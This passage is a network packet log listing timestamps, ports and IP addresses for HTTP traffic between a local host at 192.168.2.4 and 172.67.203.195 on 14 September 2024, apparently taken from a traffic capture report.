Sep 14, 2024 18:31:09.950539112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950548887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950563908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950573921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950609922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950609922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950680971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950690985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950691938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950700998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950711966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950721979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950733900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950763941 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950845957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950855970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950864077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950869083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950879097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950887918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950897932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950907946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950918913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950928926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950934887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950973988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951020956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951030970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951039076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951050043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951059103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951070070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951143026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951175928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951183081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951195002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951204062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951215029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951239109 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951272011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951380968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951396942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951406956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951524019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951565027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951572895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951581955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951591015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951600075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951610088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951621056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951630116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951632023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951642036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951652050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951661110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951669931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951709986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951719999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951729059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951740026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951747894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951750040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951765060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951773882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951777935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951783895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951797009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951807022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951808929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951817036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951827049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951836109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951845884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951847076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951857090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951869011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951877117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951894999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951895952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951905012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951915026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951922894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951932907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951941967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951951981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951958895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.951961040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951972961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951982975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.951992989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.952001095 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.952002048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.952014923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.952023029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.952023983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.952033997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.952043056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.952053070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.952054977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.952063084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.952073097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.952074051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.952112913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.952133894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.990951061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.991051912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.991063118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.991195917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.991206884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.991215944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.991221905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.991292000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.991525888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.033744097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033767939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033780098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033786058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033797026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033808947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033827066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033838987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033849955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033860922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033873081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033883095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033893108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033905029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.033943892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.033958912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.034184933 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.034399986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.034411907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.034423113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.034465075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.034476995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.034487009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.034498930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.034499884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.034543991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.034599066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.035182953 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035231113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035242081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035285950 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.035310030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035329103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035341978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035361052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035371065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035449028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035460949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035473108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035474062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.035485029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035496950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035582066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035583973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.035594940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035608053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035619974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035630941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035641909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035660028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.035703897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035715103 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.035717964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035732031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035741091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035773039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.035804987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035815001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035825968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.035825968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035842896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035912991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.035953045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035965919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035976887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.035989046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036001921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036011934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036022902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036030054 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036040068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036051989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036087036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036098003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036102057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036221981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036225080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036233902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036247015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036257029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036267042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036278963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036290884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036303043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036314011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036387920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036391973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036400080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036420107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036431074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036443949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036463022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036474943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036487103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036497116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036498070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036571980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036571980 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036642075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036653996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036665916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036678076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036680937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036689043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036740065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036758900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036766052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036772013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036829948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036842108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036854029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036856890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036869049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036922932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036941051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.036942959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036962032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036974907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.036986113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037013054 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.037058115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037067890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.037070990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037086010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037096024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037118912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.037200928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.037323952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.037431002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037451029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037461996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037503004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.037507057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037519932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037539959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037550926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037556887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.037564039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.037647963 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.038093090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.038104057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.038141966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.038189888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.038199902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.038203955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.038249016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.038259983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.038274050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.038285971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.038295984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.038383007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.076858997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.076879978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.076888084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.076894045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.076900005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.076905966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.076913118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.077030897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.077145100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.121886015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.121897936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.121915102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122039080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122050047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122061014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122071028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122082949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122220993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122231960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122242928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122247934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122380972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122385025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.122391939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122404099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122430086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.122483015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.122857094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122875929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.122992039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.123018026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.123030901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.123042107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.123178959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.123189926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.123245955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.123281002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.124314070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124325991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124336958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124434948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.124475002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124485016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124495983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124500990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124512911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124524117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124536991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124654055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124665976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124675989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124686956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124689102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.124700069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124761105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.124839067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124850035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124861002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124927044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:10.124978065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.124989986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125000000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125017881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125030994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125041962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125052929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125065088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:10.125123024 CEST	80	49738	172.67.203.195	192.168.2.4
